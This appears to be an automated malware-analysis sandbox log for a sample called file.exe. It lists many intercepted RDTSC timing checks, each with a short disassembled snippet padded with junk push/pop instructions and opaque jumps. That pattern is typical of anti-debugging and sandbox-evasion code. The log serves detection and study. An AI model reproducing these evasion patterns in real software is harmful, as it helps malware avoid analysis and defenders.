Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF45C second address: CEF46B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF46B second address: CEF471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF471 second address: CEF489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F29FC51833Dh 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEF489 second address: CEF493 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F29FCD43466h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF18BA second address: CF18DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F29FC518347h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF1A6F second address: CF1A9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F29FCD43470h 0x0000000a jmp 00007F29FCD43475h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF88D6 second address: CF88F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F29FC518344h 0x0000000b jo 00007F29FC518336h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF88F6 second address: CF8900 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F29FCD43466h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF781D second address: CF7821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7821 second address: CF7825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7825 second address: CF7835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F29FC518336h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7835 second address: CF7839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF7839 second address: CF7845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F29FC518336h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA15B4 second address: CA15B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA15B9 second address: CA15BE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA15BE second address: CA163A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F29FCD43468h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov dword ptr [ebp+1247D12Ah], ecx 0x0000002a push 00000004h 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007F29FCD43468h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 00000017h 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 sbb dh, 00000003h 0x00000049 pushad 0x0000004a add dword ptr [ebp+122D1AEDh], edi 0x00000050 popad 0x00000051 nop 0x00000052 jmp 00007F29FCD43478h 0x00000057 push eax 0x00000058 pushad 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA163A second address: CA165A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29FC518347h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA165A second address: CA165E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF8658 second address: CF865D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF865D second address: CF8662 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFB2B8 second address: CFB2BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFB2BF second address: CFB2C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFB2C5 second address: CFB2CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFB2CB second address: CFB2CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFB416 second address: CFB435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 jmp 00007F29FC518340h 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F29FC518336h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D084FF second address: D08509 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F29FCD43466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D08509 second address: D08524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC518345h 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D08524 second address: D0853F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F29FCD43471h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D06514 second address: D06518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D06AEF second address: D06AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F29FCD4346Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0787F second address: D07885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D07885 second address: D078B8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F29FCD43466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F29FCD4346Eh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jne 00007F29FCD43474h 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D078B8 second address: D078BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D07EA9 second address: D07EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D07EAE second address: D07EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D081C2 second address: D081C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0D275 second address: D0D279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0D279 second address: D0D2BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FCD43476h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F29FCD43470h 0x0000000e jmp 00007F29FCD43473h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0D2BC second address: D0D2C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0C663 second address: D0C668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0C668 second address: D0C674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F29FC518336h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0C674 second address: D0C678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0CBDE second address: D0CC21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F29FC518336h 0x0000000a popad 0x0000000b push esi 0x0000000c jmp 00007F29FC518349h 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 jmp 00007F29FC518344h 0x0000001d pushad 0x0000001e popad 0x0000001f pop edi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1A97E second address: D1A98A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F29FCD4346Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1A98A second address: D1A98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1981F second address: D1983B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F29FCD43473h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1983B second address: D19841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1E00C second address: D1E016 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29FCD4346Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D22A74 second address: D22A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D22BEF second address: D22BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D22BF5 second address: D22BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D22BF9 second address: D22C3C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29FCD43466h 0x00000008 jmp 00007F29FCD4346Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 je 00007F29FCD43466h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007F29FCD43479h 0x00000026 pop edi 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D246E1 second address: D246E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D246E7 second address: D246F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2FEEF second address: D2FEF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2FEF8 second address: D2FEFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2FEFE second address: D2FF02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2FF02 second address: D2FF06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3C9E1 second address: D3C9E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D3C9E5 second address: D3C9E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C334 second address: D4C360 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F29FC518341h 0x0000000e jno 00007F29FC518336h 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 pushad 0x00000018 jo 00007F29FC518336h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C360 second address: D4C36B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C908 second address: D4C92D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518344h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F29FC51833Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4F0BB second address: D4F0C0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4EF41 second address: D4EF4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 js 00007F29FC518336h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D64679 second address: D6467F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D721C4 second address: D721EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518348h 0x00000007 pushad 0x00000008 ja 00007F29FC518336h 0x0000000e jnc 00007F29FC518336h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A175 second address: D8A17A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A17A second address: D8A182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8A439 second address: D8A43D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8AAA9 second address: D8AAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8AAAF second address: D8AAB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8AAB3 second address: D8AABD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F29FC518336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8C50D second address: D8C511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8C511 second address: D8C522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F29FC518338h 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8F16D second address: D8F171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8F171 second address: D8F17F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F29FC518336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8F17F second address: D8F183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8F183 second address: D8F1A5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F29FC518336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop esi 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b jnc 00007F29FC518336h 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8F1A5 second address: D8F1F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29FCD43472h 0x00000008 jmp 00007F29FCD43472h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 jo 00007F29FCD43472h 0x00000018 jl 00007F29FCD4346Ch 0x0000001e jns 00007F29FCD43466h 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push ecx 0x0000002b jnl 00007F29FCD43466h 0x00000031 pop ecx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8F46E second address: D8F4D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518343h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F29FC518338h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 push dword ptr [ebp+122D2F5Dh] 0x0000002a xor dword ptr [ebp+124607DAh], edi 0x00000030 call 00007F29FC518339h 0x00000035 jmp 00007F29FC518344h 0x0000003a push eax 0x0000003b je 00007F29FC518344h 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8F4D9 second address: D8F521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F29FCD43466h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F29FCD43475h 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 pushad 0x00000018 js 00007F29FCD43466h 0x0000001e jmp 00007F29FCD43475h 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 pop eax 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D90ECF second address: D90ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D90ED3 second address: D90ED9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D90ED9 second address: D90EFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC51833Eh 0x00000009 jmp 00007F29FC518343h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA4F48 second address: CA4F65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FCD43479h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA4F65 second address: CA4F9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC518349h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F29FC518343h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA4F9D second address: CA4FA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA03BB second address: 4AA03CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC51833Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA03CA second address: 4AA040A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 300Ah 0x00000007 mov ax, bx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f mov eax, 3C561329h 0x00000014 mov si, B8E5h 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b pushad 0x0000001c call 00007F29FCD4346Ch 0x00000021 pop ecx 0x00000022 jmp 00007F29FCD4346Bh 0x00000027 popad 0x00000028 mov ah, 6Eh 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA040A second address: 4AA040E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AA040E second address: 4AA0414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC066E second address: 4AC0674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0674 second address: 4AC0678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC0678 second address: 4AC06DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b pushfd 0x0000000c jmp 00007F29FC51833Dh 0x00000011 add cx, 48C6h 0x00000016 jmp 00007F29FC518341h 0x0000001b popfd 0x0000001c pop eax 0x0000001d pushfd 0x0000001e jmp 00007F29FC518341h 0x00000023 add si, A226h 0x00000028 jmp 00007F29FC518341h 0x0000002d popfd 0x0000002e popad 0x0000002f mov dword ptr [esp], ebp 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AC06DC second address: 4AC06E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
